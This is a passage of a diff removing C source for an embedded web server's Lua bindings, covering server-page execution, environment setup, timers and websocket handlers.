-					if (!buf) {
-						return luaL_error(L, "OOM in get_info() call");
-					}
-					len = mg_get_connection_info(ctx, idx, buf, len + 63);
-					lua_pushlstring(L, buf, len);
-					mg_free(buf);
-				} else {
-					lua_pushstring(L, "");
-				}
-#else
-				(void)ctx;
-				(void)idx;
-				lua_pushstring(L, "");
-#endif
-
-				return 1;
-			}
-			return 0;
-		}
-	}
-
-	/* Syntax error */
-	return luaL_error(L, "invalid get_info() call");
-}
-
-
-/* mg.get_option */
-static int
-lsp_get_option(lua_State *L)
-{
-	int num_args = lua_gettop(L);
-	int type1;
-	const char *arg1;
-	const char *data;
-
-	/* Get context */
-	struct mg_context *ctx;
-	lua_pushlightuserdata(L, (void *)&lua_regkey_ctx);
-	lua_gettable(L, LUA_REGISTRYINDEX);
-	ctx = (struct mg_context *)lua_touserdata(L, -1);
-
-	if (num_args == 0) {
-		const struct mg_option *opts = mg_get_valid_options();
-
-		if (!opts) {
-			return 0;
-		}
-
-		lua_newtable(L);
-		while (opts->name) {
-			data = mg_get_option(ctx, opts->name);
-			if (data) {
-				reg_string(L, opts->name, data);
-			}
-			opts++;
-		}
-
-		return 1;
-	}
-
-	if (num_args == 1) {
-		type1 = lua_type(L, 1);
-		if (type1 == LUA_TSTRING) {
-			arg1 = lua_tostring(L, 1);
-			/* Get option according to argument */
-			data = mg_get_option(ctx, arg1);
-			if (data) {
-				lua_pushstring(L, data);
-				return 1;
-			}
-			return 0;
-		}
-	}
-
-	/* Syntax error */
-	return luaL_error(L, "invalid get_option() call");
-}
-
-
-/* UUID library and function pointer */
-union {
-	void *p;
-	void (*f)(unsigned char uuid[16]);
-} pf_uuid_generate;
-
-
-/* mg.uuid */
-static int
-lsp_uuid(lua_State *L)
-{
-	union {
-		unsigned char uuid_array[16];
-		struct uuid_struct_type {
-			uint32_t data1;
-			uint16_t data2;
-			uint16_t data3;
-			uint8_t data4[8];
-		} uuid_struct;
-	} uuid;
-
-	char uuid_str[40];
-	int num_args = lua_gettop(L);
-
-	memset(&uuid, 0, sizeof(uuid));
-	memset(uuid_str, 0, sizeof(uuid_str));
-
-	if (num_args == 0) {
-
-		pf_uuid_generate.f(uuid.uuid_array);
-
-		sprintf(uuid_str,
-		        "{%08lX-%04X-%04X-%02X%02X-"
-		        "%02X%02X%02X%02X%02X%02X}",
-		        (unsigned long)uuid.uuid_struct.data1,
-		        (unsigned)uuid.uuid_struct.data2,
-		        (unsigned)uuid.uuid_struct.data3,
-		        (unsigned)uuid.uuid_struct.data4[0],
-		        (unsigned)uuid.uuid_struct.data4[1],
-		        (unsigned)uuid.uuid_struct.data4[2],
-		        (unsigned)uuid.uuid_struct.data4[3],
-		        (unsigned)uuid.uuid_struct.data4[4],
-		        (unsigned)uuid.uuid_struct.data4[5],
-		        (unsigned)uuid.uuid_struct.data4[6],
-		        (unsigned)uuid.uuid_struct.data4[7]);
-
-		lua_pushstring(L, uuid_str);
-		return 1;
-	}
-
-	/* Syntax error */
-	return luaL_error(L, "invalid random() call");
-}
-
-
-#ifdef USE_WEBSOCKET
-struct lua_websock_data {
-	lua_State *state;
-	char *script;
-	unsigned references;
-	struct mg_connection *conn[MAX_WORKER_THREADS];
-	pthread_mutex_t ws_mutex;
-};
-#endif
-
-
-/* mg.write for websockets */
-static int
-lwebsock_write(lua_State *L)
-{
-#ifdef USE_WEBSOCKET
-	int num_args = lua_gettop(L);
-	struct lua_websock_data *ws;
-	const char *str;
-	size_t size;
-	int opcode = -1;
-	unsigned i;
-	struct mg_connection *client = NULL;
-
-	lua_pushlightuserdata(L, (void *)&lua_regkey_connlist);
-	lua_gettable(L, LUA_REGISTRYINDEX);
-	ws = (struct lua_websock_data *)lua_touserdata(L, -1);
-
-	(void)pthread_mutex_lock(&(ws->ws_mutex));
-
-	if (num_args == 1) {
-		/* just one text: send it to all client */
-		if (lua_isstring(L, 1)) {
-			opcode = WEBSOCKET_OPCODE_TEXT;
-		}
-	} else if (num_args == 2) {
-		if (lua_isnumber(L, 1)) {
-			/* opcode number and message text */
-			opcode = (int)lua_tointeger(L, 1);
-		} else if (lua_isstring(L, 1)) {
-			/* opcode string and message text */
-			str = lua_tostring(L, 1);
-			if (!mg_strncasecmp(str, "text", 4))
-				opcode = WEBSOCKET_OPCODE_TEXT;
-			else if (!mg_strncasecmp(str, "bin", 3))
-				opcode = WEBSOCKET_OPCODE_BINARY;
-			else if (!mg_strncasecmp(str, "close", 5))
-				opcode = WEBSOCKET_OPCODE_CONNECTION_CLOSE;
-			else if (!mg_strncasecmp(str, "ping", 4))
-				opcode = WEBSOCKET_OPCODE_PING;
-			else if (!mg_strncasecmp(str, "pong", 4))
-				opcode = WEBSOCKET_OPCODE_PONG;
-			else if (!mg_strncasecmp(str, "cont", 4))
-				opcode = WEBSOCKET_OPCODE_CONTINUATION;
-		} else if (lua_isuserdata(L, 1)) {
-			/* client id and message text */
-			client = (struct mg_connection *)lua_touserdata(L, 1);
-			opcode = WEBSOCKET_OPCODE_TEXT;
-		}
-	} else if (num_args == 3) {
-		if (lua_isuserdata(L, 1)) {
-			client = (struct mg_connection *)lua_touserdata(L, 1);
-			if (lua_isnumber(L, 2)) {
-				/* client id, opcode number and message text */
-				opcode = (int)lua_tointeger(L, 2);
-			} else if (lua_isstring(L, 2)) {
-				/* client id, opcode string and message text */
-				str = lua_tostring(L, 2);
-				if (!mg_strncasecmp(str, "text", 4))
-					opcode = WEBSOCKET_OPCODE_TEXT;
-				else if (!mg_strncasecmp(str, "bin", 3))
-					opcode = WEBSOCKET_OPCODE_BINARY;
-				else if (!mg_strncasecmp(str, "close", 5))
-					opcode = WEBSOCKET_OPCODE_CONNECTION_CLOSE;
-				else if (!mg_strncasecmp(str, "ping", 4))
-					opcode = WEBSOCKET_OPCODE_PING;
-				else if (!mg_strncasecmp(str, "pong", 4))
-					opcode = WEBSOCKET_OPCODE_PONG;
-				else if (!mg_strncasecmp(str, "cont", 4))
-					opcode = WEBSOCKET_OPCODE_CONTINUATION;
-			}
-		}
-	}
-
-	if (opcode >= 0 && opcode < 16 && lua_isstring(L, num_args)) {
-		str = lua_tolstring(L, num_args, &size);
-		if (client) {
-			for (i = 0; i < ws->references; i++) {
-				if (client == ws->conn[i]) {
-					mg_lock_connection(ws->conn[i]);
-					mg_websocket_write(ws->conn[i], opcode, str, size);
-					mg_unlock_connection(ws->conn[i]);
-				}
-			}
-		} else {
-			for (i = 0; i < ws->references; i++) {
-				mg_lock_connection(ws->conn[i]);
-				mg_websocket_write(ws->conn[i], opcode, str, size);
-				mg_unlock_connection(ws->conn[i]);
-			}
-		}
-	} else {
-		(void)pthread_mutex_unlock(&(ws->ws_mutex));
-		return luaL_error(L, "invalid websocket write() call");
-	}
-
-	(void)pthread_mutex_unlock(&(ws->ws_mutex));
-
-#else
-	(void)(L);           /* unused */
-#endif
-	return 0;
-}
-
-
-struct laction_arg {
-	lua_State *state;
-	const char *script;
-	pthread_mutex_t *pmutex;
-	char txt[1];
-};
-
-
-static int
-lua_action(struct laction_arg *arg)
-{
-	int err, ok;
-	struct mg_context *ctx;
-
-	(void)pthread_mutex_lock(arg->pmutex);
-
-	lua_pushlightuserdata(arg->state, (void *)&lua_regkey_ctx);
-	lua_gettable(arg->state, LUA_REGISTRYINDEX);
-	ctx = (struct mg_context *)lua_touserdata(arg->state, -1);
-
-	err = luaL_loadstring(arg->state, arg->txt);
-	if (err != 0) {
-		lua_cry(fc(ctx), err, arg->state, arg->script, "timer");
-		(void)pthread_mutex_unlock(arg->pmutex);
-		mg_free(arg);
-		return 0;
-	}
-	err = lua_pcall(arg->state, 0, 1, 0);
-	if (err != 0) {
-		lua_cry(fc(ctx), err, arg->state, arg->script, "timer");
-		(void)pthread_mutex_unlock(arg->pmutex);
-		mg_free(arg);
-		return 0;
-	}
-
-	ok = lua_type(arg->state, -1);
-	if (lua_isboolean(arg->state, -1)) {
-		ok = lua_toboolean(arg->state, -1);
-	} else {
-		ok = 0;
-	}
-	lua_pop(arg->state, 1);
-
-	(void)pthread_mutex_unlock(arg->pmutex);
-
-	if (!ok) {
-		mg_free(arg);
-	}
-	return ok;
-}
-
-
-static int
-lua_action_free(struct laction_arg *arg)
-{
-	if (lua_action(arg)) {
-		mg_free(arg);
-	}
-	return 0;
-}
-
-
-static int
-lwebsocket_set_timer(lua_State *L, int is_periodic)
-{
-#if defined(USE_TIMERS) && defined(USE_WEBSOCKET)
-	int num_args = lua_gettop(L);
-	struct lua_websock_data *ws;
-	int type1, type2, ok = 0;
-	double timediff;
-	struct mg_context *ctx;
-	struct laction_arg *arg;
-	const char *txt;
-	size_t txt_len;
-
-	lua_pushlightuserdata(L, (void *)&lua_regkey_ctx);
-	lua_gettable(L, LUA_REGISTRYINDEX);
-	ctx = (struct mg_context *)lua_touserdata(L, -1);
-
-	lua_pushlightuserdata(L, (void *)&lua_regkey_connlist);
-	lua_gettable(L, LUA_REGISTRYINDEX);
-	ws = (struct lua_websock_data *)lua_touserdata(L, -1);
-
-	if (num_args < 2) {
-		return luaL_error(L,
-		                  "not enough arguments for set_timer/interval() call");
-	}
-
-	type1 = lua_type(L, 1);
-	type2 = lua_type(L, 2);
-
-	if (type1 == LUA_TSTRING && type2 == LUA_TNUMBER && num_args == 2) {
-		timediff = (double)lua_tonumber(L, 2);
-		txt = lua_tostring(L, 1);
-		txt_len = strlen(txt);
-		arg = (struct laction_arg *)mg_malloc_ctx(sizeof(struct laction_arg)
-		                                              + txt_len + 10,
-		                                          ctx);
-		arg->state = L;
-		arg->script = ws->script;
-		arg->pmutex = &(ws->ws_mutex);
-		memcpy(arg->txt, "return(", 7);
-		memcpy(arg->txt + 7, txt, txt_len);
-		arg->txt[txt_len + 7] = ')';
-		arg->txt[txt_len + 8] = 0;
-		ok =
-		    (0
-		     == timer_add(ctx,
-		                  timediff,
-		                  is_periodic,
-		                  1,
-		                  (taction)(is_periodic ? lua_action : lua_action_free),
-		                  (void *)arg));
-	} else if (type1 == LUA_TFUNCTION && type2 == LUA_TNUMBER) {
-		/* TODO (mid): not implemented yet */
-		return luaL_error(L, "invalid arguments for set_timer/interval() call");
-	} else {
-		return luaL_error(L, "invalid arguments for set_timer/interval() call");
-	}
-
-	lua_pushboolean(L, ok);
-	return 1;
-
-#else
-	(void)(L);           /* unused */
-	(void)(is_periodic); /* unused */
-	return 0;
-#endif
-}
-
-
-/* mg.set_timeout for websockets */
-static int
-lwebsocket_set_timeout(lua_State *L)
-{
-	return lwebsocket_set_timer(L, 0);
-}
-
-
-/* mg.set_interval for websockets */
-static int
-lwebsocket_set_interval(lua_State *L)
-{
-	return lwebsocket_set_timer(L, 1);
-}
-
-enum {
-	LUA_ENV_TYPE_LUA_SERVER_PAGE = 0,
-	LUA_ENV_TYPE_PLAIN_LUA_PAGE = 1,
-	LUA_ENV_TYPE_LUA_WEBSOCKET = 2,
-};
-
-
-static void
-prepare_lua_request_info(struct mg_connection *conn, lua_State *L)
-{
-	const char *s;
-	int i;
-
-	/* Export mg.request_info */
-	lua_pushstring(L, "request_info");
-	lua_newtable(L);
-	reg_string(L, "request_method", conn->request_info.request_method);
-	reg_string(L, "request_uri", conn->request_info.request_uri);
-	reg_string(L, "uri", conn->request_info.local_uri);
-	reg_string(L, "http_version", conn->request_info.http_version);
-	reg_string(L, "query_string", conn->request_info.query_string);
-#if defined(MG_LEGACY_INTERFACE)
-	reg_int(L, "remote_ip", conn->request_info.remote_ip); /* remote_ip is
-	                                                          deprecated, use
-	                                                          remote_addr
-	                                                          instead */
-#endif
-	reg_string(L, "remote_addr", conn->request_info.remote_addr);
-	/* TODO (high): ip version */
-	reg_int(L, "remote_port", conn->request_info.remote_port);
-	reg_int(L, "num_headers", conn->request_info.num_headers);
-	reg_int(L, "server_port", ntohs(conn->client.lsa.sin.sin_port));
-
-	if (conn->path_info != NULL) {
-		reg_string(L, "path_info", conn->path_info);
-	}
-
-	if (conn->request_info.content_length >= 0) {
-		/* reg_int64: content_length */
-		lua_pushstring(L, "content_length");
-		lua_pushnumber(
-		    L,
-		    (lua_Number)conn->request_info
-		        .content_length); /* lua_Number may be used as 52 bit integer */
-		lua_rawset(L, -3);
-	}
-	if ((s = mg_get_header(conn, "Content-Type")) != NULL) {
-		reg_string(L, "content_type", s);
-	}
-
-	if (conn->request_info.remote_user != NULL) {
-		reg_string(L, "remote_user", conn->request_info.remote_user);
-		reg_string(L, "auth_type", "Digest");
-	}
-
-	reg_boolean(L, "https", conn->ssl != NULL);
-
-	if (conn->status_code > 0) {
-		/* Lua error handler should show the status code */
-		reg_int(L, "status", conn->status_code);
-	}
-
-	lua_pushstring(L, "http_headers");
-	lua_newtable(L);
-	for (i = 0; i < conn->request_info.num_headers; i++) {
-		reg_string(L,
-		           conn->request_info.http_headers[i].name,
-		           conn->request_info.http_headers[i].value);
-	}
-	lua_rawset(L, -3);
-
-	lua_rawset(L, -3);
-}
-
-
-static void
-civetweb_open_lua_libs(lua_State *L)
-{
-	{
-		extern void luaL_openlibs(lua_State *);
-		luaL_openlibs(L);
-	}
-
-#ifdef USE_LUA_SQLITE3
-	{
-		extern int luaopen_lsqlite3(lua_State *);
-		luaopen_lsqlite3(L);
-	}
-#endif
-#ifdef USE_LUA_LUAXML
-	{
-		extern int luaopen_LuaXML_lib(lua_State *);
-		luaopen_LuaXML_lib(L);
-	}
-#endif
-#ifdef USE_LUA_FILE_SYSTEM
-	{
-		extern int luaopen_lfs(lua_State *);
-		luaopen_lfs(L);
-	}
-#endif
-#ifdef USE_LUA_BINARY
-	{
-		/* TODO (low): Test if this could be used as a replacement for bit32.
-		 * Check again with Lua 5.3 later. */
-		extern int luaopen_binary(lua_State *);
-
-		luaL_requiref(L, "binary", luaopen_binary, 1);
-		lua_pop(L, 1);
-	}
-#endif
-}
-
-
-static void
-prepare_lua_environment(struct mg_context *ctx,
-                        struct mg_connection *conn,
-                        struct lua_websock_data *ws_conn_list,
-                        lua_State *L,
-                        const char *script_name,
-                        int lua_env_type)
-{
-	civetweb_open_lua_libs(L);
-
-#if LUA_VERSION_NUM == 502
-	/* Keep the "connect" method for compatibility,
-	 * but do not backport it to Lua 5.1.
-	 * TODO: Redesign the interface.
-	 */
-	luaL_newmetatable(L, LUASOCKET);
-	lua_pushliteral(L, "__index");
-	luaL_newlib(L, luasocket_methods);
-	lua_rawset(L, -3);
-	lua_pop(L, 1);
-	lua_register(L, "connect", lsp_connect);
-#endif
-
-	/* Store context in the registry */
-	if (ctx != NULL) {
-		lua_pushlightuserdata(L, (void *)&lua_regkey_ctx);
-		lua_pushlightuserdata(L, (void *)ctx);
-		lua_settable(L, LUA_REGISTRYINDEX);
-	}
-	if (ws_conn_list != NULL) {
-		lua_pushlightuserdata(L, (void *)&lua_regkey_connlist);
-		lua_pushlightuserdata(L, (void *)ws_conn_list);
-		lua_settable(L, LUA_REGISTRYINDEX);
-	}
-
-	/* Lua server pages store the depth of mg.include, in order
-	 * to detect recursions and prevent stack overflows. */
-	if (lua_env_type == LUA_ENV_TYPE_LUA_SERVER_PAGE) {
-		struct lsp_include_history *h;
-		lua_pushlightuserdata(L, (void *)&lua_regkey_lsp_include_history);
-		h = (struct lsp_include_history *)
-		    lua_newuserdata(L, sizeof(struct lsp_include_history));
-		lua_settable(L, LUA_REGISTRYINDEX);
-		memset(h, 0, sizeof(struct lsp_include_history));
-	}
-
-	/* Register mg module */
-	lua_newtable(L);
-
-	switch (lua_env_type) {
-	case LUA_ENV_TYPE_LUA_SERVER_PAGE:
-		reg_string(L, "lua_type", "page");
-		break;
-	case LUA_ENV_TYPE_PLAIN_LUA_PAGE:
-		reg_string(L, "lua_type", "script");
-		break;
-	case LUA_ENV_TYPE_LUA_WEBSOCKET:
-		reg_string(L, "lua_type", "websocket");
-		break;
-	}
-
-	if (lua_env_type == LUA_ENV_TYPE_LUA_SERVER_PAGE
-	    || lua_env_type == LUA_ENV_TYPE_PLAIN_LUA_PAGE) {
-		reg_conn_function(L, "cry", lsp_cry, conn);
-		reg_conn_function(L, "read", lsp_read, conn);
-		reg_conn_function(L, "write", lsp_write, conn);
-		reg_conn_function(L, "keep_alive", lsp_keep_alive, conn);
-		reg_conn_function(L, "send_file", lsp_send_file, conn);
-	}
-
-	if (lua_env_type == LUA_ENV_TYPE_LUA_SERVER_PAGE) {
-		reg_conn_function(L, "include", lsp_include, conn);
-		reg_conn_function(L, "redirect", lsp_redirect, conn);
-	}
-
-	if (lua_env_type == LUA_ENV_TYPE_LUA_WEBSOCKET) {
-		reg_function(L, "write", lwebsock_write);
-#ifdef USE_TIMERS
-		reg_function(L, "set_timeout", lwebsocket_set_timeout);
-		reg_function(L, "set_interval", lwebsocket_set_interval);
-#endif
-		/* reg_conn_function(L, "send_file", lsp_send_file, conn); */
-	}
-
-	reg_function(L, "time", lsp_get_time);
-	reg_function(L, "get_var", lsp_get_var);
-	reg_function(L, "get_mime_type", lsp_get_mime_type);
-	reg_function(L, "get_cookie", lsp_get_cookie);
-	reg_function(L, "md5", lsp_md5);
-	reg_function(L, "url_encode", lsp_url_encode);
-	reg_function(L, "url_decode", lsp_url_decode);
-	reg_function(L, "base64_encode", lsp_base64_encode);
-	reg_function(L, "base64_decode", lsp_base64_decode);
-	reg_function(L, "get_response_code_text", lsp_get_response_code_text);
-	reg_function(L, "random", lsp_random);
-	reg_function(L, "get_info", lsp_get_info);
-	reg_function(L, "get_option", lsp_get_option);
-
-	if (pf_uuid_generate.f) {
-		reg_function(L, "uuid", lsp_uuid);
-	}
-
-	reg_string(L, "version", CIVETWEB_VERSION);
-
-	reg_string(L, "script_name", script_name);
-
-	if (ctx != NULL) {
-		reg_string(L, "document_root", ctx->config[DOCUMENT_ROOT]);
-		reg_string(L, "auth_domain", ctx->config[AUTHENTICATION_DOMAIN]);
-#if defined(USE_WEBSOCKET)
-		if (ctx->config[WEBSOCKET_ROOT]) {
-			reg_string(L, "websocket_root", ctx->config[WEBSOCKET_ROOT]);
-		} else {
-			reg_string(L, "websocket_root", ctx->config[DOCUMENT_ROOT]);
-		}
-#endif
-
-		if (ctx->systemName != NULL) {
-			reg_string(L, "system", ctx->systemName);
-		}
-	}
-
-	/* Export connection specific info */
-	if (conn != NULL) {
-		prepare_lua_request_info(conn, L);
-	}
-
-	lua_setglobal(L, "mg");
-
-	/* Register default mg.onerror function */
-	IGNORE_UNUSED_RESULT(
-	    luaL_dostring(L,
-	                  "mg.onerror = function(e) mg.write('\\nLua error:\\n', "
-	                  "debug.traceback(e, 1)) end"));
-
-	if (ctx != NULL) {
-		/* Preload */
-		if (ctx->config[LUA_PRELOAD_FILE] != NULL) {
-			IGNORE_UNUSED_RESULT(luaL_dofile(L, ctx->config[LUA_PRELOAD_FILE]));
-		}
-
-		if (ctx->callbacks.init_lua != NULL) {
-			ctx->callbacks.init_lua(conn, L);
-		}
-	}
-}
-
-
-static int
-lua_error_handler(lua_State *L)
-{
-	const char *error_msg = lua_isstring(L, -1) ? lua_tostring(L, -1) : "?\n";
-
-	lua_getglobal(L, "mg");
-	if (!lua_isnil(L, -1)) {
-		lua_getfield(L, -1, "write"); /* call mg.write() */
-		lua_pushstring(L, error_msg);
-		lua_pushliteral(L, "\n");
-		lua_call(L, 2, 0);
-		IGNORE_UNUSED_RESULT(
-		    luaL_dostring(L, "mg.write(debug.traceback(), '\\n')"));
-	} else {
-		printf("Lua error: [%s]\n", error_msg);
-		IGNORE_UNUSED_RESULT(
-		    luaL_dostring(L, "print(debug.traceback(), '\\n')"));
-	}
-	/* TODO(lsm, low): leave the stack balanced */
-
-	return 0;
-}
-
-
-static void *
-lua_allocator(void *ud, void *ptr, size_t osize, size_t nsize)
-{
-	(void)osize; /* not used */
-
-	if (nsize == 0) {
-		mg_free(ptr);
-		return NULL;
-	}
-	return mg_realloc_ctx(ptr, nsize, (struct mg_context *)ud);
-}
-
-
-static void
-mg_exec_lua_script(struct mg_connection *conn,
-                   const char *path,
-                   const void **exports)
-{
-	int i;
-	lua_State *L;
-
-	/* Assume the script does not support keep_alive. The script may change this
-	 * by calling mg.keep_alive(true). */
-	conn->must_close = 1;
-
-	/* Execute a plain Lua script. */
-	if (path != NULL
-	    && (L = lua_newstate(lua_allocator, (void *)(conn->ctx))) != NULL) {
-		prepare_lua_environment(
-		    conn->ctx, conn, NULL, L, path, LUA_ENV_TYPE_PLAIN_LUA_PAGE);
-		lua_pushcclosure(L, &lua_error_handler, 0);
-
-		if (exports != NULL) {
-#if LUA_VERSION_NUM > 501
-			lua_pushglobaltable(L);
-			for (i = 0; exports[i] != NULL && exports[i + 1] != NULL; i += 2) {
-				lua_CFunction func;
-				lua_pushstring(L, (const char *)(exports[i]));
-				*(const void **)(&func) = exports[i + 1];
-				lua_pushcclosure(L, func, 0);
-				lua_rawset(L, -3);
-			}
-#else
-			for (i = 0; exports[i] != NULL && exports[i + 1] != NULL; i += 2) {
-				lua_CFunction func;
-				const char *name = (const char *)(exports[i]);
-				*(const void **)(&func) = exports[i + 1];
-				lua_register(L, name, func);
-			}
-#endif
-		}
-
-		if (luaL_loadfile(L, path) != 0) {
-			lua_error_handler(L);
-		}
-		lua_pcall(L, 0, 0, -2);
-		lua_close(L);
-	}
-}
-
-
-static int
-handle_lsp_request(struct mg_connection *conn,
-                   const char *path,
-                   struct mg_file *filep,
-                   struct lua_State *ls)
-{
-	void *p = NULL;
-	lua_State *L = NULL;
-	struct lsp_include_history *include_history;
-	int error = 1;
-
-	/* Assume the script does not support keep_alive. The script may change this
-	 * by calling mg.keep_alive(true). */
-	conn->must_close = 1;
-
-	/* mg_fopen opens the file and sets the size accordingly */
-	if (!mg_fopen(conn, path, MG_FOPEN_MODE_READ, filep)) {
-
-		/* File not found or not accessible */
-		if (ls == NULL) {
-			mg_send_http_error(conn,
-			                   500,
-			                   "Error: Cannot open script file %s",
-			                   path);
-		} else {
-			luaL_error(ls, "Cannot include [%s]: not found", path);
-		}
-
-		goto cleanup_handle_lsp_request;
-	}
-
-	/* Map file in memory (size is known). */
-	if (filep->access.membuf == NULL
-	    && (p = mmap(NULL,
-	                 (size_t)filep->stat.size,
-	                 PROT_READ,
-	                 MAP_PRIVATE,
-	                 fileno(filep->access.fp),
-	                 0)) == MAP_FAILED) {
-
-		/* mmap failed */
-		if (ls == NULL) {
-			mg_send_http_error(
-			    conn,
-			    500,
-			    "Error: Cannot open script\nFile %s can not be mapped",
-			    path);
-		} else {
-			luaL_error(ls,
-			           "mmap(%s, %zu, %d): %s",
-			           path,
-			           (size_t)filep->stat.size,
-			           fileno(filep->access.fp),
-			           strerror(errno));
-		}
-
-		goto cleanup_handle_lsp_request;
-	}
-
-	if (ls != NULL) {
-		L = ls;
-	} else {
-		L = lua_newstate(lua_allocator, (void *)(conn->ctx));
-		if (L == NULL) {
-			mg_send_http_error(
-			    conn,
-			    500,
-			    "%s",
-			    "Error: Cannot execute script\nlua_newstate failed");
-
-			goto cleanup_handle_lsp_request;
-		}
-		prepare_lua_environment(
-		    conn->ctx, conn, NULL, L, path, LUA_ENV_TYPE_LUA_SERVER_PAGE);
-	}
-
-	/* Get LSP include history table */
-	lua_pushlightuserdata(L, (void *)&lua_regkey_lsp_include_history);
-	lua_gettable(L, LUA_REGISTRYINDEX);
-	include_history = (struct lsp_include_history *)lua_touserdata(L, -1);
-
-	/* Store script name and increment depth */
-	include_history->depth++;
-	include_history->script[include_history->depth] = path;
-
-	/* Lua state is ready to use */
-	/* We're not sending HTTP headers here, Lua page must do it. */
-	error = run_lsp(conn,
-	                path,
-	                (filep->access.membuf == NULL)
-	                    ? (const char *)p
-	                    : (const char *)filep->access.membuf,
-	                filep->stat.size,
-	                L);
-
-cleanup_handle_lsp_request:
-
-	if (L != NULL && ls == NULL)
-		lua_close(L);
-	if (p != NULL)
-		munmap(p, filep->stat.size);
-	(void)mg_fclose(&filep->access);
-
-	return error;
-}
-
-
-#ifdef USE_WEBSOCKET
-struct mg_shared_lua_websocket_list {
-	struct lua_websock_data ws;
-	struct mg_shared_lua_websocket_list *next;
-};
-
-
-static void *
-lua_websocket_new(const char *script, struct mg_connection *conn)
-{
-	struct mg_shared_lua_websocket_list **shared_websock_list =
-	    &(conn->ctx->shared_lua_websockets);
-	struct lua_websock_data *ws;
-	int err, ok = 0;
-
-	assert(conn->lua_websocket_state == NULL);
-
-	/* lock list (mg_context global) */
-	mg_lock_context(conn->ctx);
-	while (*shared_websock_list) {
-		/* check if ws already in list */
-		if (0 == strcmp(script, (*shared_websock_list)->ws.script)) {
-			break;
-		}
-		shared_websock_list = &((*shared_websock_list)->next);
-	}
-
-	if (*shared_websock_list == NULL) {
-		/* add ws to list */
-		*shared_websock_list =
-		    (struct mg_shared_lua_websocket_list *)mg_calloc_ctx(
-		        sizeof(struct mg_shared_lua_websocket_list), 1, conn->ctx);
-		if (*shared_websock_list == NULL) {
-			mg_unlock_context(conn->ctx);
-			mg_cry(conn, "Cannot create shared websocket struct, OOM");
-			return NULL;
-		}
-		/* init ws list element */
-		ws = &(*shared_websock_list)->ws;
-		ws->script = mg_strdup(script); /* TODO (low): handle OOM */
-		pthread_mutex_init(&(ws->ws_mutex), &pthread_mutex_attr);
-		(void)pthread_mutex_lock(&(ws->ws_mutex));
-		ws->state = lua_newstate(lua_allocator, (void *)(conn->ctx));
-		ws->conn[0] = conn;
-		ws->references = 1;
-		prepare_lua_environment(
-		    conn->ctx, NULL, ws, ws->state, script, LUA_ENV_TYPE_LUA_WEBSOCKET);
-		err = luaL_loadfile(ws->state, script);
-		if (err != 0) {
-			lua_cry(conn, err, ws->state, script, "load");
-		}
-		err = lua_pcall(ws->state, 0, 0, 0);
-		if (err != 0) {
-			lua_cry(conn, err, ws->state, script, "init");
-		}
-	} else {
-		/* inc ref count */
-		ws = &(*shared_websock_list)->ws;
-		(void)pthread_mutex_lock(&(ws->ws_mutex));
-		(*shared_websock_list)->ws.conn[(ws->references)++] = conn;
-	}
-	mg_unlock_context(conn->ctx);
-
-	/* call add */
-	lua_getglobal(ws->state, "open");
-	lua_newtable(ws->state);
-	prepare_lua_request_info(conn, ws->state);
-	lua_pushstring(ws->state, "client");
-	lua_pushlightuserdata(ws->state, (void *)conn);
-	lua_rawset(ws->state, -3);
-
-	err = lua_pcall(ws->state, 1, 1, 0);
-	if (err != 0) {
-		lua_cry(conn, err, ws->state, script, "open handler");
-	} else {
-		if (lua_isboolean(ws->state, -1)) {
-			ok = lua_toboolean(ws->state, -1);
-		}
-		lua_pop(ws->state, 1);
-	}
-	if (!ok) {
-		/* Remove from ws connection list. */
-		/* TODO (mid): Check if list entry and Lua state needs to be deleted
-		 * (see websocket_close). */
-		(*shared_websock_list)->ws.conn[--(ws->references)] = 0;
-	}
-
-	(void)pthread_mutex_unlock(&(ws->ws_mutex));
-
-	return ok ? (void *)ws : NULL;
-}
-
-
-static int
-lua_websocket_data(struct mg_connection *conn,
-                   int bits,
-                   char *data,
-                   size_t data_len,
-                   void *ws_arg)
-{
-	struct lua_websock_data *ws = (struct lua_websock_data *)(ws_arg);
-	int err, ok = 0;
-
-	assert(ws != NULL);
-	assert(ws->state != NULL);
-
-	(void)pthread_mutex_lock(&(ws->ws_mutex));
-
-	lua_getglobal(ws->state, "data");
-	lua_newtable(ws->state);
-	lua_pushstring(ws->state, "client");
-	lua_pushlightuserdata(ws->state, (void *)conn);
-	lua_rawset(ws->state, -3);
-	lua_pushstring(ws->state, "bits"); /* TODO: dont use "bits" but fields with
-	                                      a meaning according to
-	                                      http://tools.ietf.org/html/rfc6455,
-	                                      section 5.2 */
-	lua_pushnumber(ws->state, bits);
-	lua_rawset(ws->state, -3);
-	lua_pushstring(ws->state, "data");
-	lua_pushlstring(ws->state, data, data_len);
-	lua_rawset(ws->state, -3);
-
-	err = lua_pcall(ws->state, 1, 1, 0);
-	if (err != 0) {
-		lua_cry(conn, err, ws->state, ws->script, "data handler");
-	} else {
-		if (lua_isboolean(ws->state, -1)) {
-			ok = lua_toboolean(ws->state, -1);
-		}
-		lua_pop(ws->state, 1);
-	}
-	(void)pthread_mutex_unlock(&(ws->ws_mutex));
-
-	return ok;
-}
-
-
-static int
-lua_websocket_ready(struct mg_connection *conn, void *ws_arg)
-{
-	struct lua_websock_data *ws = (struct lua_websock_data *)(ws_arg);
-	int err, ok = 0;
-
-	assert(ws != NULL);
-	assert(ws->state != NULL);
-
-	(void)pthread_mutex_lock(&(ws->ws_mutex));
-
-	lua_getglobal(ws->state, "ready");
-	lua_newtable(ws->state);
-	lua_pushstring(ws->state, "client");
-	lua_pushlightuserdata(ws->state, (void *)conn);
-	lua_rawset(ws->state, -3);
-	err = lua_pcall(ws->state, 1, 1, 0);
-	if (err != 0) {
-		lua_cry(conn, err, ws->state, ws->script, "ready handler");
-	} else {
-		if (lua_isboolean(ws->state, -1)) {
-			ok = lua_toboolean(ws->state, -1);
-		}
-		lua_pop(ws->state, 1);
-	}
-
-	(void)pthread_mutex_unlock(&(ws->ws_mutex));
-
-	return ok;
-}
-
-
-static void
-lua_websocket_close(struct mg_connection *conn, void *ws_arg)
-{
-	struct lua_websock_data *ws = (struct lua_websock_data *)(ws_arg);
-	struct mg_shared_lua_websocket_list **shared_websock_list =
-	    &(conn->ctx->shared_lua_websockets);
-	int err = 0;
-	unsigned i;
-
-	assert(ws != NULL);
-	assert(ws->state != NULL);
-
-	(void)pthread_mutex_lock(&(ws->ws_mutex));
-
-	lua_getglobal(ws->state, "close");
-	lua_newtable(ws->state);
-	lua_pushstring(ws->state, "client");
-	lua_pushlightuserdata(ws->state, (void *)conn);
-	lua_rawset(ws->state, -3);
-
-	err = lua_pcall(ws->state, 1, 0, 0);
-	if (err != 0) {
-		lua_cry(conn, err, ws->state, ws->script, "close handler");
-	}
-	for (i = 0; i < ws->references; i++) {
